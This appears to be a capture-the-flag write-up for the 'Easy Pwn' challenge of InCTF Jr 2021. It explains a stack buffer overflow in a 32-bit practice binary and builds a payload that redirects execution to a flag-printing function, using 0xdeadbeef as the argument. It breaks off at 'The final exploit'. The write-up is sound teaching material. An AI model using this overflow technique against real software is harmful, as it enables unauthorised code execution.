InCTF Jr Qualifiers 2021
Starts 6PM, 28th Dec
InCTF Jr

Game Of Pwns

Easy Pwn

Author: NightKing

A 32bit binary has been given.

Decompilation

Looking at the vuln() function..

We see there an scope of an buffer overflow as we can see that the read() function can take an input with a more input length(0x54) than the allocated memory(0x2c).

If we read the challenge description it is pretty clear that we have to find the iron throne. And while decompiling/debugging we see an iron_throne() function.

Aahaa !!

We see that this iron_throne() is called with a parameter which is later checked to a number = -0x2152411 which translates as 0xdeadbeef

And then we are supposed to get the flag with system("cat flag.txt")

Crafting the exploit

payload = b'a'*44 as the required buffer payload += b'x'*12 as padding required to reach the eip payload += p32(elf.symbols["iron_throne"]) adding the address of the iron_throne() payload += p32(0xdeadbeef)+p32(0xdeadbeef) the parameter of the function iron_throne() and the return address.

The final exploit